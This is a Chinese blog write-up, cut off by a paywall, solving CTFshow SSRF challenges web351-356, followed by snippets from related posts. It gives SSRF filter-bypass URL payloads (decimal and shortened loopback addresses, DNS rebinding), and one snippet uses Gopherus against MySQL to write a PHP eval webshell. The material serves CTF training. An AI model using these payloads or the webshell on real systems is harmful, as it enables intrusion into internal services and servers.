CTFshow SSRF(web351-360)

原创

已于 2023-03-17 19:05:01 修改 · 880 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#php #ctf

于 2023-03-17 18:38:31 首次发布

本文详细介绍了CTF比赛中遇到的一系列SSRF（Server-Side Request Forgery）漏洞，从web351到web356，涵盖了各种绕过策略，包括file协议读取、进制转换、DNS重绑定、长度限制利用等。对于web359和web360，重点讨论了如何利用SSRF攻击无密码的MySQL和Redis服务，并给出了利用工具Gopherus的使用技巧。

web351

思路

直接用file协议读取flag()

题解

url=http://localhost/var/www/html/flag.php

web352

思路

要用http或者https,过滤了preg_match('/localhost|127.0.0/')，这里可以用进制转换绕过
在这里插入图片描述

题解

url=http://2130706433/flag.php

web353

同上

web354

思路

这里ban了0和1
preg_match('/localhost|1|0|。/i', $url)

可以考虑使用DNS重绑定攻击

https://requestrepo.com/

在这里插入图片描述

题解

url=http://a.hboku28b.requestrepo.com/flag.php

web355

思路

限制了$host长度小于5，可以用127.1代替

题解

url=http://127.1/flag.php

web356

思路

这次长度小于3,因为是linux环境，这里可以用0来代替127.0.0.1

0在linux系

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Kradress

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【CTFshow】SSRF web351-360wp

weixin_51614272的博客

03-06

564

目录web351、352、353 、355、356web354、357web358web359、360 具体解析请查看这里：点击此处 web351、352、353 、355、356 url=http://0/flag.php url=http://0.0.0.0/flag.php url=http://127.1/flag.php url=http://2130706433/flag.php url=http://017700000001/flag.php url=http://0b111111100000

ctfshow web入门 ssrf web351--web360

2301_81040377的博客

05-14

493

我测试了一下会显示504，我以为是环境的问题就没有整了，结果问了大菜鸡师傅，没问题，直接访问shell.php就行，这个故事告诉我们还是要多尝试。127.0.0.0/8是一个环回地址网段，从127.0.0.1 ~ 127.255.255.254都表示localhost。这道题我先是直接想访问flag.php，后来回显说必须是本地，于是payload。ip地址还可以通过表示成其他进制的形式访问，IP地址二进制、十进制、十六进制互换。然后访问shell.php进行rce即可。用服务器DNS重定向。

参与评论您还未登录，请先登录后发表或查看评论

ctfshow web入门 ssrf web351~web360

qq_62989306的博客

09-13

1408

ssrf之127.0.0.1绕过、域名指向、302跳转、DNS重定向、gopher打mysql、redis……

ctfshow-web入门-ssrf-351--360

yutianovo的博客

01-14

920

Web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 使用 file

CTFSHOW-web351-360

qq_52579508的博客

08-01

534

这段代码就是简单的获取一个网页并输出直接post。

ctfshow-web351(SSRF)

m0_62094846的博客

06-27

311

flag存在于flag.php中，但是不能用当前的网址，试试本地网址（127.0.0.1）

ctfshow-web入门-SSRF（web351-web360）

Welcome To Myon'Blog !

11-16

1971

通过 filter_var() 验证得到的 IP 地址是否为有效的公共 IP 地址，并且不是私有或保留地址。使用 gethostbyname() 将 URL 中的域名解析为对应的 IP 地址。使用 file_get_contents() 获取并输出该 URL 对应的内容。限制只能使用 http 或者 https 协议，并且禁止本地地址访问。匹配以 http://ctf. 开头，并且以 show 结尾。看到 curl_exec 函数，很典型的 SSRF。这次检测的是 127.0. 开头的。

CTFSHOW-web入门-SSRF（web351-web360）

最新发布

JL20050725的博客

08-09

1044

有关SSRF的更多讲解可以看我的另一篇文章。

CTFshow_Web_SSRF——web351~web360（除354、357）

Ho1aAs‘s Blog

03-18

2518

文章目录前言一、知识点Ⅰ、SSRF攻击点Ⅱ、gopher协议二、题解web351web352、353web355web356web358web359web360完前言 354和357由于端口改变、服务器所限等原因，无法解出一、知识点 Ⅰ、SSRF攻击点 <?php $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER,

ctfshow SSRF web351~360

shinygod的博客

09-25

1403

SSRF练习和学习

ctfshow SSRF web351-web360 wp

mumuzi的博客

02-10

4053

WDNMD(We Did Nothing Means Done)

ctfshow web入门ssrf359,360

xiaolong22333的博客

02-06

1346

记录一下做法，原理啥的还有点懵 web359 打开是登录框，先随便输点什么，然后抓包发现有个returl参数，并且可以随意更改url，这应该就是我们的利用点了然后就是gopher协议打mysql,这里用到这个工具gopherus python gopherus.py --exploit mysql 生成一句话木马 select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/2.php'; 记得把_后面那一大段内

CTFshow-SSRF-Web351~Web360做题笔记

dasdasdasvsdV的博客

08-05

284

首先了解一下在PHP中curl函数是用来干什么的：curl是一个强大的库，能够连接通讯各种服务器、支持各种协议。基于curl命令能让用户通过URL和许多不同的服务器进行交流，比如用来请求Web服务器，同时它也支持https认证、http、post、ftp上传、代理、cookies、简单口令认证等功能。由Web服务器发起请求，直接输出。

CTFshow刷题日记-WEB-SSRF（web351-360）SSRF总结

Love&Share

09-28

9483

SSRF基础 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）相关函数和类 file_get_contents()：将整个文件或一个url所指向的文件读入一个字符串中 readfile()：输出一个文件的内容 fsockopen()：打开一个网络连接或者一个Unix 套接字连接

【CTFWP】ctfshow-web351-358

LongL_GuYu的博客

08-08

944

CTFWP：ctfshow-web351-358

ctfshow

2401_87493916的博客

12-04

1096

if判断⾥的： FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP FILTER_FLAG_NO_PRIV_RANGE - 要求值是 RFC 指定的私域 IP （⽐如 192.168.0.1） FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。访问之后发现是一个视频，用f12看了看也，没什么有用的东西，就将视频下载下来了，用随波逐流看了一下发现有一个隐藏文件。有压缩包不会自动解压。

ctfshow-ssrf writeup

qq_41274349的博客

09-17

1941

ctfshow ssrf 解题指南

ctfshowSSRF漏洞Web351-352

m0_62584974的博客

04-13

1232

SRF漏洞简介 SSRF意为服务端请求伪造(ServerSideRequestForge)。攻击者利用SSRF漏洞通过服务器发起伪造请求，这样就可以访问内网的数据，进行内网信息探测或者内网漏洞利用。 SSRF漏洞形成的原因是:应用程序存在可以从其他服务器获取数据的功能，但是对服务器的地址并没有做严格的过滤，导致应用程序可以访问任意的URL链接。攻击者通过精心构造URL链接可以利用SSRF漏洞进行以下攻击: (1)通过服务器获取内网主机、端口和banner信息。 (2)对内网的应用程序进行攻击，例如...

SSRF基础以及ctf.show的SSRF(web351-web360)

wanan的博客

09-30

666

SSRF基础以及ctf.show的SSRF(web351-web360)

ctfshow ssrf

08-16